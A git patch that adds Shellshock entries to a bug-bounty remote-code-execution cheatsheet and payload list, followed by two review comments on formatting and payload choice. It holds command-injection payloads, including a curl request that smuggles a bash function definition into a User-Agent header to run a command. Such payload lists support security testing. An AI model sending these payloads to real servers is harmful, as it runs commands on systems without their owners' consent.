From f1a044b6b6dd6cc89813773bee3c195e17aef74f Mon Sep 17 00:00:00 2001 From: EdOverflow Date: Fri, 14 Jul 2017 15:25:52 +0100 Subject: [PATCH] Add Shellshock bug. --- cheatsheets/rce.md | 12 +++++++++++- payloads.txt | 4 ++++ 2 files changed, 15 insertions(+), 1 deletion(-) diff --git a/cheatsheets/rce.md b/cheatsheets/rce.md index 7307e3e..66d39cf 100644 --- a/cheatsheets/rce.md +++ b/cheatsheets/rce.md @@ -8,4 +8,14 @@ Find somewhere where user input can be supplied and submit the following string strіng ``` -If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`. \ No newline at end of file +If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`. + +**Shellshock Bug** + +```bash +() { :;}; echo vulnerable +``` + +```zsh +curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/ +``` \ No newline at end of file diff --git a/payloads.txt b/payloads.txt index e6b5015..37931af 100644 --- a/payloads.txt +++ b/payloads.txt @@ -57,6 +57,10 @@ http://[::] strіng +() { :;}; echo vulnerable + +curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/ + /%09/google.com /%5cgoogle.com
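Review bot: in the cheatsheets/rce.md hunk, the first snippet `() { :;}; echo vulnerable` is fenced as `bash` but is not something a reader can type at a bash prompt (a function definition with no name is a syntax error there); it is the string that has to reach bash as the value of an environment variable, which is what the `User-Agent` header in the second snippet is for. The new section should say that in a sentence, and the two fences should carry the same tag (`bash` for both; the curl line is not zsh-specific). A one-line local self-check such as `env x='() { :;}; echo vulnerable' bash -c 'echo test'` would also document what "vulnerable" means for a defender checking their own hosts: a patched bash prints only `test`. Finally, the file still ends without a trailing newline, as the two `\ No newline at end of file` markers show; the patch is a good moment to add one.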
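Review bot: in the payloads.txt hunk, the added line `curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/` is a complete command with a placeholder host, whereas every other entry in the file (`http://[::]`, `strіng`, `/%09/google.com`) is a raw payload string meant to be pasted into an input; keep only the header value, or drop the line since the `() { :;}; echo vulnerable` entry added just above already covers the same bug. The two entries also differ in a trivial way (`:;}` versus `:; }`), which is worth unifying. Prefer the `echo vulnerable` form as the listed indicator: it only prints a marker, while `/bin/eject` has a visible physical side effect on whatever host executes it.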